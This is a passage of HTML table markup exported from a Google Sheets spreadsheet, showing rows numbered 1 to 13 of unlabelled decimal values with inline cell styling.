padding: 2px 3px; text-align: right; vertical-align: bottom;">7.105196</td><td data-sheets-value="{"1":3,"3":1.013578}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">1.013578</td><td data-sheets-value="{"1":3,"3":1.252902}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">1.252902</td><td 
data-sheets-value="{"1":3,"3":0.625865}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.625865</td><td data-sheets-value="{"1":3,"3":0}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0</td><td data-sheets-value="{"1":3,"3":5.491767}" style="background-color: #d9ead3; border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">5.491767</td><td data-sheets-value="{"1":3,"3":0}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0</td><td data-sheets-value="{"1":3,"3":0.110781}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.110781</td><td data-sheets-value="{"1":3,"3":0.020577}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.020577</td><td data-sheets-value="{"1":3,"3":0}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0</td></tr><tr style="height: 21px;"><td data-sheets-formula="=R[-1]C[0]+1" data-sheets-value="{"1":3,"3":2}" style="background-color: #ead1dc; border-color: rgb(204, 204, 204) rgb(204, 204, 204) rgb(204, 204, 204) rgb(0, 0, 0); border-image: initial; border-style: solid; border-width: 1px; font-weight: bold; overflow: hidden; padding: 2px 3px; text-align: center; vertical-align: bottom;">2</td><td data-sheets-value="{"1":3,"3":7.545032}" style="border: 1px solid 
rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">7.545032</td><td data-sheets-value="{"1":3,"3":3.370516}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">3.370516</td><td data-sheets-value="{"1":3,"3":1.118979}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">1.118979</td><td data-sheets-value="{"1":3,"3":0.296561}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.296561</td><td data-sheets-value="{"1":3,"3":0}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0</td><td data-sheets-value="{"1":3,"3":1.170941}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">1.170941</td><td data-sheets-value="{"1":3,"3":0.170201}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.170201</td><td data-sheets-value="{"1":3,"3":0.147976}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.147976</td><td data-sheets-value="{"1":3,"3":0.215866}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.215866</td><td data-sheets-value="{"1":3,"3":0.763711}" style="background-color: #d9ead3; 
border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.763711</td></tr><tr style="height: 21px;"><td data-sheets-formula="=R[-1]C[0]+1" data-sheets-value="{"1":3,"3":3}" style="background-color: #ead1dc; border-color: rgb(204, 204, 204) rgb(204, 204, 204) rgb(204, 204, 204) rgb(0, 0, 0); border-image: initial; border-style: solid; border-width: 1px; font-weight: bold; overflow: hidden; padding: 2px 3px; text-align: center; vertical-align: bottom;">3</td><td data-sheets-value="{"1":3,"3":6.681859}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">6.681859</td><td data-sheets-value="{"1":3,"3":1.036887}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">1.036887</td><td data-sheets-value="{"1":3,"3":1.431128}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">1.431128</td><td data-sheets-value="{"1":3,"3":0}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0</td><td data-sheets-value="{"1":3,"3":0}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0</td><td data-sheets-value="{"1":3,"3":1.178761}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">1.178761</td><td data-sheets-value="{"1":3,"3":0.10031}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; 
overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.10031</td><td data-sheets-value="{"1":3,"3":0.526232}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.526232</td><td data-sheets-value="{"1":3,"3":0.019609}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.019609</td><td data-sheets-value="{"1":3,"3":0.1805}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.1805</td></tr><tr style="height: 21px;"><td data-sheets-formula="=R[-1]C[0]+1" data-sheets-value="{"1":3,"3":4}" style="background-color: #ead1dc; border-color: rgb(204, 204, 204) rgb(204, 204, 204) rgb(204, 204, 204) rgb(0, 0, 0); border-image: initial; border-style: solid; border-width: 1px; font-weight: bold; overflow: hidden; padding: 2px 3px; text-align: center; vertical-align: bottom;">4</td><td data-sheets-value="{"1":3,"3":3.948145}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">3.948145</td><td data-sheets-value="{"1":3,"3":0}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0</td><td data-sheets-value="{"1":3,"3":0}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0</td><td data-sheets-value="{"1":3,"3":0.231532}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: 
bottom;">0.231532</td><td data-sheets-value="{"1":3,"3":0.120758}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.120758</td><td data-sheets-value="{"1":3,"3":0.790898}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.790898</td><td data-sheets-value="{"1":3,"3":0.599471}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.599471</td><td data-sheets-value="{"1":3,"3":0.871498}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.871498</td><td data-sheets-value="{"1":3,"3":0.483216}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.483216</td><td data-sheets-value="{"1":3,"3":0}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0</td></tr><tr style="height: 21px;"><td data-sheets-formula="=R[-1]C[0]+1" data-sheets-value="{"1":3,"3":5}" style="background-color: #ead1dc; border-color: rgb(204, 204, 204) rgb(204, 204, 204) rgb(204, 204, 204) rgb(0, 0, 0); border-image: initial; border-style: solid; border-width: 1px; font-weight: bold; overflow: hidden; padding: 2px 3px; text-align: center; vertical-align: bottom;">5</td><td data-sheets-value="{"1":3,"3":5.816442}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">5.816442</td><td data-sheets-value="{"1":3,"3":0}" 
style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0</td><td data-sheets-value="{"1":3,"3":1.158697}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">1.158697</td><td data-sheets-value="{"1":3,"3":0.693802}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.693802</td><td data-sheets-value="{"1":3,"3":0}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0</td><td data-sheets-value="{"1":3,"3":1.778738}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">1.778738</td><td data-sheets-value="{"1":3,"3":0.715084}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.715084</td><td data-sheets-value="{"1":3,"3":0.205816}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.205816</td><td data-sheets-value="{"1":3,"3":0.029846}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.029846</td><td data-sheets-value="{"1":3,"3":0}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0</td></tr><tr style="height: 21px;"><td data-sheets-formula="=R[-1]C[0]+1" 
data-sheets-value="{"1":3,"3":6}" style="background-color: #ead1dc; border-color: rgb(204, 204, 204) rgb(204, 204, 204) rgb(204, 204, 204) rgb(0, 0, 0); border-image: initial; border-style: solid; border-width: 1px; font-weight: bold; overflow: hidden; padding: 2px 3px; text-align: center; vertical-align: bottom;">6</td><td data-sheets-value="{"1":3,"3":3.734055}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">3.734055</td><td data-sheets-value="{"1":3,"3":8.923577}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">8.923577</td><td data-sheets-value="{"1":3,"3":2.616297}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">2.616297</td><td data-sheets-value="{"1":3,"3":0}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0</td><td data-sheets-value="{"1":3,"3":0}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0</td><td data-sheets-value="{"1":3,"3":0.747448}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.747448</td><td data-sheets-value="{"1":3,"3":0.252802}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.252802</td><td data-sheets-value="{"1":3,"3":0.236518}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; 
padding: 2px 3px; text-align: right; vertical-align: bottom;">0.236518</td><td data-sheets-value="{"1":3,"3":0.020577}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.020577</td><td data-sheets-value="{"1":3,"3":0}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0</td></tr><tr style="height: 21px;"><td data-sheets-formula="=R[-1]C[0]+1" data-sheets-value="{"1":3,"3":7}" style="background-color: #ead1dc; border-color: rgb(204, 204, 204) rgb(204, 204, 204) rgb(204, 204, 204) rgb(0, 0, 0); border-image: initial; border-style: solid; border-width: 1px; font-weight: bold; overflow: hidden; padding: 2px 3px; text-align: center; vertical-align: bottom;">7</td><td data-sheets-value="{"1":3,"3":7.022468}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">7.022468</td><td data-sheets-value="{"1":3,"3":0.056858}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.056858</td><td data-sheets-value="{"1":3,"3":1.931174}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">1.931174</td><td data-sheets-value="{"1":3,"3":0.563466}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.563466</td><td data-sheets-value="{"1":3,"3":0}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0</td><td 
data-sheets-value="{"1":3,"3":1.003211}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">1.003211</td><td data-sheets-value="{"1":3,"3":0.213173}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.213173</td><td data-sheets-value="{"1":3,"3":0.198259}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.198259</td><td data-sheets-value="{"1":3,"3":0.377146}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.377146</td><td data-sheets-value="{"1":3,"3":0}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0</td></tr><tr style="height: 21px;"><td data-sheets-formula="=R[-1]C[0]+1" data-sheets-value="{"1":3,"3":8}" style="background-color: #ead1dc; border-color: rgb(204, 204, 204) rgb(204, 204, 204) rgb(204, 204, 204) rgb(0, 0, 0); border-image: initial; border-style: solid; border-width: 1px; font-weight: bold; overflow: hidden; padding: 2px 3px; text-align: center; vertical-align: bottom;">8</td><td data-sheets-value="{"1":3,"3":4.158711}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">4.158711</td><td data-sheets-value="{"1":3,"3":0.963861}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.963861</td><td data-sheets-value="{"1":3,"3":1.045184}" style="border: 1px solid 
rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">1.045184</td><td data-sheets-value="{"1":3,"3":0}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0</td><td data-sheets-value="{"1":3,"3":0}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0</td><td data-sheets-value="{"1":3,"3":0.459586}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.459586</td><td data-sheets-value="{"1":3,"3":0.590549}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.590549</td><td data-sheets-value="{"1":3,"3":0.028423}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.028423</td><td data-sheets-value="{"1":3,"3":0.28698}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.28698</td><td data-sheets-value="{"1":3,"3":0.01805}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.01805</td></tr><tr style="height: 21px;"><td data-sheets-formula="=R[-1]C[0]+1" data-sheets-value="{"1":3,"3":9}" style="background-color: #ead1dc; border-color: rgb(204, 204, 204) rgb(204, 204, 204) rgb(204, 204, 204) rgb(0, 0, 0); border-image: initial; border-style: solid; border-width: 1px; font-weight: bold; overflow: hidden; 
padding: 2px 3px; text-align: center; vertical-align: bottom;">9</td><td data-sheets-value="{"1":3,"3":5.872631}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">5.872631</td><td data-sheets-value="{"1":3,"3":0.463353}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.463353</td><td data-sheets-value="{"1":3,"3":0.387103}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.387103</td><td data-sheets-value="{"1":3,"3":0}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0</td><td data-sheets-value="{"1":3,"3":1.524341}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">1.524341</td><td data-sheets-value="{"1":3,"3":1.143632}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">1.143632</td><td data-sheets-value="{"1":3,"3":0.358465}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.358465</td><td data-sheets-value="{"1":3,"3":0.771859}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.771859</td><td data-sheets-value="{"1":3,"3":0.112953}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; 
text-align: right; vertical-align: bottom;">0.112953</td><td data-sheets-value="{"1":3,"3":0.119148}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.119148</td></tr><tr style="height: 21px;"><td data-sheets-formula="=R[-1]C[0]+1" data-sheets-value="{"1":3,"3":10}" style="background-color: #ead1dc; border-color: rgb(204, 204, 204) rgb(204, 204, 204) rgb(204, 204, 204) rgb(0, 0, 0); border-image: initial; border-style: solid; border-width: 1px; font-weight: bold; overflow: hidden; padding: 2px 3px; text-align: center; vertical-align: bottom;">10</td><td data-sheets-value="{"1":3,"3":5.959267}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">5.959267</td><td data-sheets-value="{"1":3,"3":0.9285}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.9285</td><td data-sheets-value="{"1":3,"3":8.530923}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">8.530923</td><td data-sheets-value="{"1":3,"3":1.739734}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">1.739734</td><td data-sheets-value="{"1":3,"3":0}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0</td><td data-sheets-value="{"1":3,"3":1.55761}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">1.55761</td><td 
data-sheets-value="{"1":3,"3":0.141551}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.141551</td><td data-sheets-value="{"1":3,"3":0.244138}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.244138</td><td data-sheets-value="{"1":3,"3":0.172354}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.172354</td><td data-sheets-value="{"1":3,"3":0}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0</td></tr><tr style="height: 21px;"><td data-sheets-formula="=R[-1]C[0]+1" data-sheets-value="{"1":3,"3":11}" style="background-color: #ead1dc; border-color: rgb(204, 204, 204) rgb(204, 204, 204) rgb(204, 204, 204) rgb(0, 0, 0); border-image: initial; border-style: solid; border-width: 1px; font-weight: bold; overflow: hidden; padding: 2px 3px; text-align: center; vertical-align: bottom;">11</td><td data-sheets-value="{"1":3,"3":6.141237}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">6.141237</td><td data-sheets-value="{"1":3,"3":0}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0</td><td data-sheets-value="{"1":3,"3":0.768712}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.768712</td><td data-sheets-value="{"1":3,"3":0}" style="border: 1px solid rgb(204, 204, 204); 
font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0</td><td data-sheets-value="{"1":3,"3":0.144812}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.144812</td><td data-sheets-value="{"1":3,"3":1.640483}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">1.640483</td><td data-sheets-value="{"1":3,"3":0.149433}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.149433</td><td data-sheets-value="{"1":3,"3":0.418004}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.418004</td><td data-sheets-value="{"1":3,"3":0.055891}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.055891</td><td data-sheets-value="{"1":3,"3":0.068169}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.068169</td></tr><tr style="height: 21px;"><td data-sheets-formula="=R[-1]C[0]+1" data-sheets-value="{"1":3,"3":12}" style="background-color: #ead1dc; border-color: rgb(204, 204, 204) rgb(204, 204, 204) rgb(204, 204, 204) rgb(0, 0, 0); border-image: initial; border-style: solid; border-width: 1px; font-weight: bold; overflow: hidden; padding: 2px 3px; text-align: center; vertical-align: bottom;">12</td><td data-sheets-value="{"1":3,"3":5.179697}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; 
padding: 2px 3px; text-align: right; vertical-align: bottom;">5.179697</td><td data-sheets-value="{"1":3,"3":1.992647}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">1.992647</td><td data-sheets-value="{"1":3,"3":0.713766}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.713766</td><td data-sheets-value="{"1":3,"3":0}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0</td><td data-sheets-value="{"1":3,"3":0.443053}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.443053</td><td data-sheets-value="{"1":3,"3":0.652553}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.652553</td><td data-sheets-value="{"1":3,"3":0.226234}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.226234</td><td data-sheets-value="{"1":3,"3":0.173608}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.173608</td><td data-sheets-value="{"1":3,"3":0.372956}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">0.372956</td><td data-sheets-value="{"1":3,"3":0.089291}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 
3px; text-align: right; vertical-align: bottom;">0.089291</td></tr><tr style="height: 21px;"><td data-sheets-formula="=R[-1]C[0]+1" data-sheets-value="{"1":3,"3":13}" style="background-color: #ead1dc; border-color: rgb(204, 204, 204) rgb(204, 204, 204) rgb(204, 204, 204) rgb(0, 0, 0); border-image: initial; border-style: solid; border-width: 1px; font-weight: bold; overflow: hidden; padding: 2px 3px; text-align: center; vertical-align: bottom;">13</td><td data-sheets-value="{"1":3,"3":3.181544}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">3.181544</td><td data-sheets-value="{"1":3,"3":1.945088}" style="border: 1px solid rgb(204, 204, 204); font-family: Calibri; font-size: 11pt; overflow: hidden; padding: 2px 3px; text-align: right; vertical-align: bottom;">1.945088</td><td data-sheets-value="{"1":3,"3":0.629294}" style="border: 1px solid rgb(204, 204, 204); font-family: 